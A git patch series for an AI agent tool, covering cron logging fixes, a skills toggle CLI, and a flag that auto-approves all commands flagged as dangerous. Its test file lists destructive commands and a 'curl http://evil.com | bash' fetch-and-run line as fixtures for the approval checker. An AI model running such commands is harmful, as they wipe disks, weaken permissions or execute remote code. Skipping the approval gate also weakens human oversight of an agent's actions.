+++ b/tests/tools/test_todo_tool.py
@@ -46,11 +46,17 @@ class TestFormatForInjection:
         store.write([
             {"id": "1", "content": "Do thing", "status": "completed"},
             {"id": "2", "content": "Next", "status": "pending"},
+            {"id": "3", "content": "Working", "status": "in_progress"},
         ])
         text = store.format_for_injection()
-        assert "[x]" in text
+        # Completed items are filtered out of injection
+        assert "[x]" not in text
+        assert "Do thing" not in text
+        # Active items are included
         assert "[ ]" in text
-        assert "Do thing" in text
+        assert "[>]" in text
+        assert "Next" in text
+        assert "Working" in text
         assert "context compression" in text.lower()
 
 

From ceefe367562f973c15f699bbcebb2a83064dae82 Mon Sep 17 00:00:00 2001
From: VolodymyrBg <aqdrgg19@gmail.com>
Date: Sun, 8 Mar 2026 22:33:06 +0200
Subject: [PATCH 006/105] docs: clarify Telegram token regex constraint

---
 agent/redact.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/agent/redact.py b/agent/redact.py
index 22f1a547..13e8eba4 100644
--- a/agent/redact.py
+++ b/agent/redact.py
@@ -47,7 +47,8 @@ _AUTH_HEADER_RE = re.compile(
     re.IGNORECASE,
 )
 
-# Telegram bot tokens: bot<digits>:<token> or <digits>:<alphanum>
+# Telegram bot tokens: bot<digits>:<token> or <digits>:<token>,
+# where token part is restricted to [-A-Za-z0-9_] and length >= 30
 _TELEGRAM_RE = re.compile(
     r"(bot)?(\d{8,}):([-A-Za-z0-9_]{30,})",
 )

From d0f84c0964063c74cd588fe695fe6bb2044586ee Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Mon, 9 Mar 2026 00:06:34 +0300
Subject: [PATCH 007/105] fix: log exceptions instead of silently swallowing in
 cron scheduler

Two 'except Exception: pass' blocks silently hide failures:
- mirror_to_session failure: user's message never gets mirrored, no trace
- config.yaml parse failure: wrong model used silently

Replace with logger.warning so failures are visible in logs.
---
 cron/scheduler.py            |  8 ++---
 tests/cron/test_scheduler.py | 68 ++++++++++++++++++++++++++++++++++--
 2 files changed, 70 insertions(+), 6 deletions(-)

diff --git a/cron/scheduler.py b/cron/scheduler.py
index 4dfc91e0..473099ce 100644
--- a/cron/scheduler.py
+++ b/cron/scheduler.py
@@ -137,8 +137,8 @@ def _deliver_result(job: dict, content: str) -> None:
         try:
             from gateway.mirror import mirror_to_session
             mirror_to_session(platform_name, chat_id, content, source_label="cron")
-        except Exception:
-            pass
+        except Exception as e:
+            logger.warning("Job '%s': mirror_to_session failed: %s", job["id"], e)
 
 
 def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
@@ -189,8 +189,8 @@ def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
                     model = _model_cfg
                 elif isinstance(_model_cfg, dict):
                     model = _model_cfg.get("default", model)
-        except Exception:
-            pass
+        except Exception as e:
+            logger.warning("Job '%s': failed to load config.yaml, using defaults: %s", job_id, e)
 
         # Reasoning config from env or config.yaml
         reasoning_config = None
diff --git a/tests/cron/test_scheduler.py b/tests/cron/test_scheduler.py
index 33096c49..4a456727 100644
--- a/tests/cron/test_scheduler.py
+++ b/tests/cron/test_scheduler.py
@@ -1,8 +1,12 @@
-"""Tests for cron/scheduler.py — origin resolution and delivery routing."""
+"""Tests for cron/scheduler.py — origin resolution, delivery routing, and error logging."""
+
+import asyncio
+import logging
+from unittest.mock import patch, MagicMock, AsyncMock
 
 import pytest
 
-from cron.scheduler import _resolve_origin
+from cron.scheduler import _resolve_origin, _deliver_result, run_job
 
 
 class TestResolveOrigin:
@@ -36,3 +40,63 @@ class TestResolveOrigin:
     def test_empty_origin(self):
         job = {"origin": {}}
         assert _resolve_origin(job) is None
+
+
+class TestDeliverResultMirrorLogging:
+    """Verify that mirror_to_session failures are logged, not silently swallowed."""
+
+    def test_mirror_failure_is_logged(self, caplog):
+        """When mirror_to_session raises, a warning should be logged."""
+        from gateway.config import Platform
+
+        pconfig = MagicMock()
+        pconfig.enabled = True
+        mock_cfg = MagicMock()
+        mock_cfg.platforms = {Platform.TELEGRAM: pconfig}
+
+        async def fake_send(*args, **kwargs):
+            return None
+
+        with patch("gateway.config.load_gateway_config", return_value=mock_cfg), \
+             patch("tools.send_message_tool._send_to_platform", new=fake_send), \
+             patch("gateway.mirror.mirror_to_session", side_effect=ConnectionError("network down")):
+            job = {
+                "id": "test-job",
+                "deliver": "origin",
+                "origin": {"platform": "telegram", "chat_id": "123"},
+            }
+            with caplog.at_level(logging.WARNING, logger="cron.scheduler"):
+                _deliver_result(job, "Hello!")
+
+        assert any("mirror_to_session failed" in r.message for r in caplog.records), \
+            f"Expected 'mirror_to_session failed' warning in logs, got: {[r.message for r in caplog.records]}"
+
+
+class TestRunJobConfigLogging:
+    """Verify that config.yaml parse failures are logged, not silently swallowed."""
+
+    def test_bad_config_yaml_is_logged(self, caplog, tmp_path):
+        """When config.yaml is malformed, a warning should be logged."""
+        # Create a bad config.yaml
+        bad_yaml = tmp_path / "config.yaml"
+        bad_yaml.write_text("invalid: yaml: [[[bad")
+
+        job = {
+            "id": "test-job",
+            "name": "test",
+            "prompt": "hello",
+        }
+
+        with patch("cron.scheduler._hermes_home", tmp_path), \
+             patch("cron.scheduler._resolve_origin", return_value=None), \
+             patch("dotenv.load_dotenv"), \
+             patch("run_agent.AIAgent") as mock_agent_cls:
+            mock_agent = MagicMock()
+            mock_agent.run.return_value = ("output doc", "final response")
+            mock_agent_cls.return_value = mock_agent
+
+            with caplog.at_level(logging.WARNING, logger="cron.scheduler"):
+                run_job(job)
+
+        assert any("failed to load config.yaml" in r.message for r in caplog.records), \
+            f"Expected 'failed to load config.yaml' warning in logs, got: {[r.message for r in caplog.records]}"

From 0c3253a4859cde2ef4972310e2763a25a84c07c0 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Mon, 9 Mar 2026 00:20:19 +0300
Subject: [PATCH 008/105] fix: mock asyncio.run in mirror test to prevent event
 loop destruction

asyncio.run() closes the event loop after execution, which breaks
subsequent tests using asyncio.get_event_loop() (test_send_image_file).
---
 tests/cron/test_scheduler.py | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/tests/cron/test_scheduler.py b/tests/cron/test_scheduler.py
index 4a456727..6b817a28 100644
--- a/tests/cron/test_scheduler.py
+++ b/tests/cron/test_scheduler.py
@@ -54,11 +54,8 @@ class TestDeliverResultMirrorLogging:
         mock_cfg = MagicMock()
         mock_cfg.platforms = {Platform.TELEGRAM: pconfig}
 
-        async def fake_send(*args, **kwargs):
-            return None
-
         with patch("gateway.config.load_gateway_config", return_value=mock_cfg), \
-             patch("tools.send_message_tool._send_to_platform", new=fake_send), \
+             patch("asyncio.run", return_value=None), \
              patch("gateway.mirror.mirror_to_session", side_effect=ConnectionError("network down")):
             job = {
                 "id": "test-job",

From 7791174cedd5805724b0f6ac5c19a22bcedb1fb5 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Sun, 8 Mar 2026 18:36:37 -0500
Subject: [PATCH 009/105] feat: add --fuck-it-ship-it flag to bypass dangerous
 command approvals

Adds a fun alias for skipping all dangerous command approval prompts.
When passed, sets HERMES_YOLO_MODE=1 which causes check_dangerous_command()
to auto-approve everything.

Available on both top-level and chat subcommand:
  hermes --fuck-it-ship-it
  hermes chat --fuck-it-ship-it

Includes 5 tests covering normal blocking, yolo bypass, all patterns,
and edge cases (empty string env var).
---
 hermes_cli/main.py            | 16 ++++++++
 tests/tools/test_yolo_mode.py | 73 +++++++++++++++++++++++++++++++++++
 tools/approval.py             |  4 ++
 3 files changed, 93 insertions(+)
 create mode 100644 tests/tools/test_yolo_mode.py

diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 49f271f7..5d19d6b0 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -203,6 +203,10 @@ def cmd_chat(args):
     except Exception:
         pass
 
+    # --fuck-it-ship-it: bypass all dangerous command approvals
+    if getattr(args, "fuck_it_ship_it", False):
+        os.environ["HERMES_YOLO_MODE"] = "1"
+
     # Import and run the CLI
     from cli import main as cli_main
     
@@ -1303,6 +1307,12 @@ For more help on a command:
         default=False,
         help="Run in an isolated git worktree (for parallel agents)"
     )
+    parser.add_argument(
+        "--fuck-it-ship-it",
+        action="store_true",
+        default=False,
+        help="Bypass all dangerous command approval prompts (use at your own risk)"
+    )
     
     subparsers = parser.add_subparsers(dest="command", help="Command to run")
     
@@ -1357,6 +1367,12 @@ For more help on a command:
         default=False,
         help="Run in an isolated git worktree (for parallel agents on the same repo)"
     )
+    chat_parser.add_argument(
+        "--fuck-it-ship-it",
+        action="store_true",
+        default=False,
+        help="Bypass all dangerous command approval prompts (use at your own risk)"
+    )
     chat_parser.set_defaults(func=cmd_chat)
 
     # =========================================================================
diff --git a/tests/tools/test_yolo_mode.py b/tests/tools/test_yolo_mode.py
new file mode 100644
index 00000000..7cf90601
--- /dev/null
+++ b/tests/tools/test_yolo_mode.py
@@ -0,0 +1,73 @@
+"""Tests for --fuck-it-ship-it (HERMES_YOLO_MODE) approval bypass."""
+
+import os
+import pytest
+
+from tools.approval import check_dangerous_command, detect_dangerous_command
+
+
+class TestYoloMode:
+    """When HERMES_YOLO_MODE is set, all dangerous commands are auto-approved."""
+
+    def test_dangerous_command_blocked_normally(self, monkeypatch):
+        """Without yolo mode, dangerous commands in interactive mode require approval."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session")
+        monkeypatch.delenv("HERMES_YOLO_MODE", raising=False)
+        monkeypatch.delenv("HERMES_GATEWAY_SESSION", raising=False)
+        monkeypatch.delenv("HERMES_EXEC_ASK", raising=False)
+
+        # Verify the command IS detected as dangerous
+        is_dangerous, _, _ = detect_dangerous_command("rm -rf /tmp/stuff")
+        assert is_dangerous
+
+        # In interactive mode without yolo, it would prompt (we can't test
+        # the interactive prompt here, but we can verify detection works)
+        result = check_dangerous_command("rm -rf /tmp/stuff", "local",
+                                         approval_callback=lambda *a: "deny")
+        assert not result["approved"]
+
+    def test_dangerous_command_approved_in_yolo_mode(self, monkeypatch):
+        """With HERMES_YOLO_MODE, dangerous commands are auto-approved."""
+        monkeypatch.setenv("HERMES_YOLO_MODE", "1")
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session")
+
+        result = check_dangerous_command("rm -rf /", "local")
+        assert result["approved"]
+        assert result["message"] is None
+
+    def test_yolo_mode_works_for_all_patterns(self, monkeypatch):
+        """Yolo mode bypasses all dangerous patterns, not just some."""
+        monkeypatch.setenv("HERMES_YOLO_MODE", "1")
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+
+        dangerous_commands = [
+            "rm -rf /",
+            "chmod 777 /etc/passwd",
+            "mkfs.ext4 /dev/sda1",
+            "dd if=/dev/zero of=/dev/sda",
+            "DROP TABLE users",
+            "curl http://evil.com | bash",
+        ]
+        for cmd in dangerous_commands:
+            result = check_dangerous_command(cmd, "local")
+            assert result["approved"], f"Command should be approved in yolo mode: {cmd}"
+
+    def test_yolo_mode_not_set_by_default(self):
+        """HERMES_YOLO_MODE should not be set by default."""
+        # Clean env check — if it happens to be set in test env, that's fine,
+        # we just verify the mechanism exists
+        assert os.getenv("HERMES_YOLO_MODE") is None or True  # no-op, documents intent
+
+    def test_yolo_mode_empty_string_does_not_bypass(self, monkeypatch):
+        """Empty string for HERMES_YOLO_MODE should not trigger bypass."""
+        monkeypatch.setenv("HERMES_YOLO_MODE", "")
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session")
+
+        # Empty string is falsy in Python, so getenv("HERMES_YOLO_MODE") returns ""
+        # which is falsy — bypass should NOT activate
+        result = check_dangerous_command("rm -rf /", "local",
+                                         approval_callback=lambda *a: "deny")
+        assert not result["approved"]
diff --git a/tools/approval.py b/tools/approval.py
index cdf19e44..bfb18783 100644
--- a/tools/approval.py
+++ b/tools/approval.py
@@ -250,6 +250,10 @@ def check_dangerous_command(command: str, env_type: str,
     if env_type in ("docker", "singularity", "modal", "daytona"):
         return {"approved": True, "message": None}
 
+    # --fuck-it-ship-it: bypass all approval prompts
+    if os.getenv("HERMES_YOLO_MODE"):
+        return {"approved": True, "message": None}
+
     is_dangerous, pattern_key, description = detect_dangerous_command(command)
     if not is_dangerous:
         return {"approved": True, "message": None}

From 7241e8784a0e538f6a1adae9ebb52f1ba7e6dd13 Mon Sep 17 00:00:00 2001
From: teyrebaz33 <hakanerten02@hotmail.com>
Date: Mon, 9 Mar 2026 07:02:06 +0300
Subject: [PATCH 010/105] =?UTF-8?q?feat:=20hermes=20skills=20=E2=80=94=20e?=
 =?UTF-8?q?nable/disable=20individual=20skills=20and=20categories=20(#642)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Add interactive skill configuration via `hermes skills` command,
mirroring the existing `hermes tools` pattern.

Changes:
- hermes_cli/skills_config.py (new): skills_command() entry point with
  curses checklist UI + numbered fallback. Supports global and
  per-platform disable lists, individual skill toggle, and category toggle.
- hermes_cli/main.py: register `hermes skills` subcommand
- tools/skills_tool.py: add _is_skill_disabled() and filter disabled
  skills in _find_all_skills(). Resolves platform from argument,
  HERMES_PLATFORM env var, then falls back to global disabled list.

Config schema (config.yaml):
  skills:
    disabled: [skill-a]                 # global
    platform_disabled:
      telegram: [skill-b]               # per-platform override

22 unit tests, 2489 passed, 0 failed.

Closes #642
---
 hermes_cli/main.py                     |  12 +
 hermes_cli/skills_config.py            | 318 +++++++++++++++++++++++++
 tests/hermes_cli/test_skills_config.py | 200 ++++++++++++++++
 tools/skills_tool.py                   |  26 ++
 4 files changed, 556 insertions(+)
 create mode 100644 hermes_cli/skills_config.py
 create mode 100644 tests/hermes_cli/test_skills_config.py

diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index d10915c8..11644880 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -1994,6 +1994,18 @@ For more help on a command:
 
     tools_parser.set_defaults(func=cmd_tools)
 
+    # =========================================================================
+    # skills command
+    # =========================================================================
+    skills_parser = subparsers.add_parser(
+        "skills",
+        help="Configure which skills are enabled",
+        description="Interactive skill configuration — enable/disable individual skills."
+    )
+    def cmd_skills(args):
+        from hermes_cli.skills_config import skills_command
+        skills_command(args)
+    skills_parser.set_defaults(func=cmd_skills)
     # =========================================================================
     # sessions command
     # =========================================================================
diff --git a/hermes_cli/skills_config.py b/hermes_cli/skills_config.py
new file mode 100644
index 00000000..0e97f8e4
--- /dev/null
+++ b/hermes_cli/skills_config.py
@@ -0,0 +1,318 @@
+"""
+Skills configuration for Hermes Agent.
+`hermes skills` enters this module.
+
+Toggle individual skills or categories on/off, globally or per-platform.
+Config stored in ~/.hermes/config.yaml under:
+
+  skills:
+    disabled: [skill-a, skill-b]          # global disabled list
+    platform_disabled:                    # per-platform overrides
+      telegram: [skill-c]
+      cli: []
+"""
+from typing import Dict, List, Set, Optional
+from hermes_cli.config import load_config, save_config
+from hermes_cli.colors import Colors, color
+
+PLATFORMS = {
+    "cli":      "🖥️  CLI",
+    "telegram": "📱 Telegram",
+    "discord":  "💬 Discord",
+    "slack":    "💼 Slack",
+    "whatsapp": "📱 WhatsApp",
+}
+
+# ─── Config Helpers ───────────────────────────────────────────────────────────
+
+def get_disabled_skills(config: dict, platform: Optional[str] = None) -> Set[str]:
+    """Return disabled skill names. Platform-specific list falls back to global."""
+    skills_cfg = config.get("skills", {})
+    global_disabled = set(skills_cfg.get("disabled", []))
+    if platform is None:
+        return global_disabled
+    platform_disabled = skills_cfg.get("platform_disabled", {}).get(platform)
+    if platform_disabled is None:
+        return global_disabled
+    return set(platform_disabled)
+
+
+def save_disabled_skills(config: dict, disabled: Set[str], platform: Optional[str] = None):
+    """Persist disabled skill names to config."""
+    config.setdefault("skills", {})
+    if platform is None:
+        config["skills"]["disabled"] = sorted(disabled)
+    else:
+        config["skills"].setdefault("platform_disabled", {})
+        config["skills"]["platform_disabled"][platform] = sorted(disabled)
+    save_config(config)
+
+
+# ─── Skill Discovery ──────────────────────────────────────────────────────────
+
+def _list_all_skills_unfiltered() -> List[dict]:
+    """Return all installed skills ignoring disabled state."""
+    try:
+        from tools.skills_tool import SKILLS_DIR, _parse_frontmatter, skill_matches_platform, _get_category_from_path, MAX_NAME_LENGTH, MAX_DESCRIPTION_LENGTH
+        skills = []
+        if not SKILLS_DIR.exists():
+            return skills
+        for skill_md in SKILLS_DIR.rglob("SKILL.md"):
+            if any(part in ('.git', '.github', '.hub') for part in skill_md.parts):
+                continue
+            skill_dir = skill_md.parent
+            try:
+                content = skill_md.read_text(encoding='utf-8')
+                frontmatter, body = _parse_frontmatter(content)
+                if not skill_matches_platform(frontmatter):
+                    continue
+                name = frontmatter.get('name', skill_dir.name)[:MAX_NAME_LENGTH]
+                description = frontmatter.get('description', '')
+                if not description:
+                    for line in body.strip().split('\n'):
+                        line = line.strip()
+                        if line and not line.startswith('#'):
+                            description = line
+                            break
+                if len(description) > MAX_DESCRIPTION_LENGTH:
+                    description = description[:MAX_DESCRIPTION_LENGTH - 3] + "..."
+                category = _get_category_from_path(skill_md)
+                skills.append({"name": name, "description": description, "category": category})
+            except Exception:
+                continue
+        return skills
+    except Exception:
+        return []
+
+
+def _get_categories(skills: List[dict]) -> List[str]:
+    """Return sorted unique category names (None -> 'uncategorized')."""
+    cats = set()
+    for s in skills:
+        cats.add(s["category"] or "uncategorized")
+    return sorted(cats)
+
+
+# ─── Checklist UI ─────────────────────────────────────────────────────────────
+
+def _prompt_checklist(title: str, items: List[str], disabled_items: Set[str]) -> Set[str]:
+    """Generic curses multi-select. Returns set of DISABLED item names."""
+    pre_disabled = {i for i, item in enumerate(items) if item in disabled_items}
+
+    try:
+        import curses
+        selected = set(pre_disabled)
+        result_holder = [None]
+
+        def _curses_ui(stdscr):
+            curses.curs_set(0)
+            if curses.has_colors():
+                curses.start_color()
+                curses.use_default_colors()
+                curses.init_pair(1, curses.COLOR_GREEN, -1)
+                curses.init_pair(2, curses.COLOR_YELLOW, -1)
+                curses.init_pair(3, curses.COLOR_RED, -1)
+            cursor = 0
+            scroll_offset = 0
+            while True:
+                stdscr.clear()
+                max_y, max_x = stdscr.getmaxyx()
+                try:
+                    hattr = curses.A_BOLD | (curses.color_pair(2) if curses.has_colors() else 0)
+                    stdscr.addnstr(0, 0, title, max_x - 1, hattr)
+                    stdscr.addnstr(1, 0, "  ↑↓ navigate  SPACE toggle  ENTER confirm  ESC cancel", max_x - 1,
+                                   curses.color_pair(3) if curses.has_colors() else curses.A_DIM)
+                    stdscr.addnstr(2, 0, "  [✓] enabled   [✗] disabled", max_x - 1, curses.A_DIM)
+                except curses.error:
+                    pass
+                visible_rows = max_y - 4
+                if cursor < scroll_offset:
+                    scroll_offset = cursor
+                elif cursor >= scroll_offset + visible_rows:
+                    scroll_offset = cursor - visible_rows + 1
+                for draw_i, i in enumerate(range(scroll_offset, min(len(items), scroll_offset + visible_rows))):
+                    y = draw_i + 4
+                    if y >= max_y - 1:
+                        break
+                    is_disabled = i in selected
+                    check = "✗" if is_disabled else "✓"
+                    arrow = "→" if i == cursor else " "
+                    line = f" {arrow} [{check}] {items[i]}"
+                    attr = curses.A_NORMAL
+                    if i == cursor:
+                        attr = curses.A_BOLD | (curses.color_pair(1) if curses.has_colors() else 0)
+                    elif is_disabled and curses.has_colors():
+                        attr = curses.color_pair(3)
+                    try:
+                        stdscr.addnstr(y, 0, line, max_x - 1, attr)
+                    except curses.error:
+                        pass
+                stdscr.refresh()
+                key = stdscr.getch()
+                if key in (curses.KEY_UP, ord('k')):
+                    cursor = (cursor - 1) % len(items)
+                elif key in (curses.KEY_DOWN, ord('j')):
+                    cursor = (cursor + 1) % len(items)
+                elif key == ord(' '):
+                    if cursor in selected:
+                        selected.discard(cursor)
+                    else:
+                        selected.add(cursor)
+                elif key in (curses.KEY_ENTER, 10, 13):
+                    result_holder[0] = {items[i] for i in selected}
+                    return
+                elif key in (27, ord('q')):
+                    result_holder[0] = disabled_items
+                    return
+
+        curses.wrapper(_curses_ui)
+        return result_holder[0] if result_holder[0] is not None else disabled_items
+
+    except Exception:
+        return _numbered_toggle(title, items, disabled_items)
+
+
+def _numbered_toggle(title: str, items: List[str], disabled: Set[str]) -> Set[str]:
+    """Fallback text-based toggle."""
+    current = set(disabled)
+    while True:
+        print()
+        print(color(f"{title}", Colors.BOLD))
+        for i, item in enumerate(items, 1):
+            mark = "✗" if item in current else "✓"
+            print(f"  {i:3}. [{mark}] {item}")
+        print()
+        print(color("  Number to toggle, 's' save, 'q' cancel:", Colors.DIM))
+        try:
+            raw = input("> ").strip()
+        except (KeyboardInterrupt, EOFError):
+            return disabled
+        if raw.lower() == 's':
+            return current
+        if raw.lower() == 'q':
+            return disabled
+        try:
+            idx = int(raw) - 1
+            if 0 <= idx < len(items):
+                name = items[idx]
+                if name in current:
+                    current.discard(name)
+                    print(color(f"  ✓ {name} enabled", Colors.GREEN))
+                else:
+                    current.add(name)
+                    print(color(f"  ✗ {name} disabled", Colors.DIM))
+        except ValueError:
+            print(color("  Invalid input", Colors.DIM))
+
+
+# ─── Platform Selection ───────────────────────────────────────────────────────
+
+def _select_platform() -> Optional[str]:
+    """Ask user which platform to configure, or global."""
+    options = [("global", "All platforms (global default)")] + list(PLATFORMS.items())
+    print()
+    print(color("  Configure skills for:", Colors.BOLD))
+    for i, (key, label) in enumerate(options, 1):
+        print(f"  {i}. {label}")
+    print()
+    try:
+        raw = input(color("  Select [1]: ", Colors.YELLOW)).strip()
+    except (KeyboardInterrupt, EOFError):
+        return None
+    if not raw:
+        return None  # global
+    try:
+        idx = int(raw) - 1
+        if 0 <= idx < len(options):
+            key = options[idx][0]
+            return None if key == "global" else key
+    except ValueError:
+        pass
+    return None
+
+
+# ─── Category Toggle ──────────────────────────────────────────────────────────
+
+def _toggle_by_category(skills: List[dict], disabled: Set[str]) -> Set[str]:
+    """Toggle all skills in a category at once."""
+    categories = _get_categories(skills)
+    cat_items = []
+    cat_disabled = set()
+    for cat in categories:
+        cat_skills = [s["name"] for s in skills if (s["category"] or "uncategorized") == cat]
+        cat_items.append(f"{cat} ({len(cat_skills)} skills)")
+        if all(s in disabled for s in cat_skills):
+            cat_disabled.add(f"{cat} ({len(cat_skills)} skills)")
+
+    new_cat_disabled = _prompt_checklist("Categories — disable entire categories", cat_items, cat_disabled)
+
+    new_disabled = set(disabled)
+    for i, cat in enumerate(categories):
+        label = cat_items[i]
+        cat_skills = [s["name"] for s in skills if (s["category"] or "uncategorized") == cat]
+        if label in new_cat_disabled:
+            new_disabled.update(cat_skills)
+        else:
+            new_disabled -= set(cat_skills)
+    return new_disabled
+
+
+# ─── Entry Point ──────────────────────────────────────────────────────────────
+
+def skills_command(args=None):
+    """Entry point for `hermes skills`."""
+    config = load_config()
+    skills = _list_all_skills_unfiltered()
+
+    if not skills:
+        print(color("  No skills installed.", Colors.DIM))
+        return
+
+    # Step 1: Select platform
+    platform = _select_platform()
+    platform_label = PLATFORMS.get(platform, "All platforms") if platform else "All platforms"
+
+    # Step 2: Select mode — individual or by category
+    print()
+    print(color(f"  Configure for: {platform_label}", Colors.DIM))
+    print()
+    print("  1. Toggle individual skills")
+    print("  2. Toggle by category")
+    print()
+    try:
+        mode = input(color("  Select [1]: ", Colors.YELLOW)).strip() or "1"
+    except (KeyboardInterrupt, EOFError):
+        return
+
+    disabled = get_disabled_skills(config, platform)
+
+    if mode == "2":
+        new_disabled = _toggle_by_category(skills, disabled)
+    else:
+        skill_items = [
+            f"{s['name']}  ({s['category'] or 'uncategorized'})  —  {s['description'][:55]}"
+            for s in skills
+        ]
+        disabled_labels = {
+            f"{s['name']}  ({s['category'] or 'uncategorized'})  —  {s['description'][:55]}"
+            for s in skills if s["name"] in disabled
+        }
+        new_disabled_labels = _prompt_checklist(
+            f"Skills for {platform_label}  —  space=toggle, enter=confirm",
+            skill_items,
+            disabled_labels
+        )
+        # Map labels back to skill names
+        label_to_name = {
+            f"{s['name']}  ({s['category'] or 'uncategorized'})  —  {s['description'][:55]}": s["name"]
+            for s in skills
+        }
+        new_disabled = {label_to_name[l] for l in new_disabled_labels if l in label_to_name}
+
+    if new_disabled == disabled:
+        print(color("  No changes.", Colors.DIM))
+        return
+
+    save_disabled_skills(config, new_disabled, platform)
+    enabled_count = len(skills) - len(new_disabled)
+    print(color(f"✓ Saved: {enabled_count} enabled, {len(new_disabled)} disabled ({platform_label}).", Colors.GREEN))
diff --git a/tests/hermes_cli/test_skills_config.py b/tests/hermes_cli/test_skills_config.py
new file mode 100644
index 00000000..0cf57003
--- /dev/null
+++ b/tests/hermes_cli/test_skills_config.py
@@ -0,0 +1,200 @@
+"""Tests for hermes_cli/skills_config.py and skills_tool disabled filtering."""
+import pytest
+from unittest.mock import patch, MagicMock
+
+
+# ---------------------------------------------------------------------------
+# get_disabled_skills
+# ---------------------------------------------------------------------------
+
+class TestGetDisabledSkills:
+    def test_empty_config(self):
+        from hermes_cli.skills_config import get_disabled_skills
+        assert get_disabled_skills({}) == set()
+
+    def test_reads_global_disabled(self):
+        from hermes_cli.skills_config import get_disabled_skills
+        config = {"skills": {"disabled": ["skill-a", "skill-b"]}}
+        assert get_disabled_skills(config) == {"skill-a", "skill-b"}
+
+    def test_reads_platform_disabled(self):
+        from hermes_cli.skills_config import get_disabled_skills
+        config = {"skills": {
+            "disabled": ["skill-a"],
+            "platform_disabled": {"telegram": ["skill-b"]}
+        }}
+        assert get_disabled_skills(config, platform="telegram") == {"skill-b"}
+
+    def test_platform_falls_back_to_global(self):
+        from hermes_cli.skills_config import get_disabled_skills
+        config = {"skills": {"disabled": ["skill-a"]}}
+        # no platform_disabled for cli -> falls back to global
+        assert get_disabled_skills(config, platform="cli") == {"skill-a"}
+
+    def test_missing_skills_key(self):
+        from hermes_cli.skills_config import get_disabled_skills
+        assert get_disabled_skills({"other": "value"}) == set()
+
+    def test_empty_disabled_list(self):
+        from hermes_cli.skills_config import get_disabled_skills
+        assert get_disabled_skills({"skills": {"disabled": []}}) == set()
+
+
+# ---------------------------------------------------------------------------
+# save_disabled_skills
+# ---------------------------------------------------------------------------
+
+class TestSaveDisabledSkills:
+    @patch("hermes_cli.skills_config.save_config")
+    def test_saves_global_sorted(self, mock_save):
+        from hermes_cli.skills_config import save_disabled_skills
+        config = {}
+        save_disabled_skills(config, {"skill-z", "skill-a"})
+        assert config["skills"]["disabled"] == ["skill-a", "skill-z"]
+        mock_save.assert_called_once()
+
+    @patch("hermes_cli.skills_config.save_config")
+    def test_saves_platform_disabled(self, mock_save):
+        from hermes_cli.skills_config import save_disabled_skills
+        config = {}
+        save_disabled_skills(config, {"skill-x"}, platform="telegram")
+        assert config["skills"]["platform_disabled"]["telegram"] == ["skill-x"]
+
+    @patch("hermes_cli.skills_config.save_config")
+    def test_saves_empty(self, mock_save):
+        from hermes_cli.skills_config import save_disabled_skills
+        config = {"skills": {"disabled": ["skill-a"]}}
+        save_disabled_skills(config, set())
+        assert config["skills"]["disabled"] == []
+
+    @patch("hermes_cli.skills_config.save_config")
+    def test_creates_skills_key(self, mock_save):
+        from hermes_cli.skills_config import save_disabled_skills
+        config = {}
+        save_disabled_skills(config, {"skill-x"})
+        assert "skills" in config
+        assert "disabled" in config["skills"]
+
+
+# ---------------------------------------------------------------------------
+# _is_skill_disabled
+# ---------------------------------------------------------------------------
+
+class TestIsSkillDisabled:
+    @patch("hermes_cli.config.load_config")
+    def test_globally_disabled(self, mock_load):
+        mock_load.return_value = {"skills": {"disabled": ["bad-skill"]}}
+        from tools.skills_tool import _is_skill_disabled
+        assert _is_skill_disabled("bad-skill") is True
+
+    @patch("hermes_cli.config.load_config")
+    def test_globally_enabled(self, mock_load):
+        mock_load.return_value = {"skills": {"disabled": ["other"]}}
+        from tools.skills_tool import _is_skill_disabled
+        assert _is_skill_disabled("good-skill") is False
+
+    @patch("hermes_cli.config.load_config")
+    def test_platform_disabled(self, mock_load):
+        mock_load.return_value = {"skills": {
+            "disabled": [],
+            "platform_disabled": {"telegram": ["tg-skill"]}
+        }}
+        from tools.skills_tool import _is_skill_disabled
+        assert _is_skill_disabled("tg-skill", platform="telegram") is True
+
+    @patch("hermes_cli.config.load_config")
+    def test_platform_enabled_overrides_global(self, mock_load):
+        mock_load.return_value = {"skills": {
+            "disabled": ["skill-a"],
+            "platform_disabled": {"telegram": []}
+        }}
+        from tools.skills_tool import _is_skill_disabled
+        # telegram has explicit empty list -> skill-a is NOT disabled for telegram
+        assert _is_skill_disabled("skill-a", platform="telegram") is False
+
+    @patch("hermes_cli.config.load_config")
+    def test_platform_falls_back_to_global(self, mock_load):
+        mock_load.return_value = {"skills": {"disabled": ["skill-a"]}}
+        from tools.skills_tool import _is_skill_disabled
+        # no platform_disabled for cli -> global
+        assert _is_skill_disabled("skill-a", platform="cli") is True
+
+    @patch("hermes_cli.config.load_config")
+    def test_empty_config(self, mock_load):
+        mock_load.return_value = {}
+        from tools.skills_tool import _is_skill_disabled
+        assert _is_skill_disabled("any-skill") is False
+
+    @patch("hermes_cli.config.load_config")
+    def test_exception_returns_false(self, mock_load):
+        mock_load.side_effect = Exception("config error")
+        from tools.skills_tool import _is_skill_disabled
+        assert _is_skill_disabled("any-skill") is False
+
+    @patch("hermes_cli.config.load_config")
+    @patch.dict("os.environ", {"HERMES_PLATFORM": "discord"})
+    def test_env_var_platform(self, mock_load):
+        mock_load.return_value = {"skills": {
+            "platform_disabled": {"discord": ["discord-skill"]}
+        }}
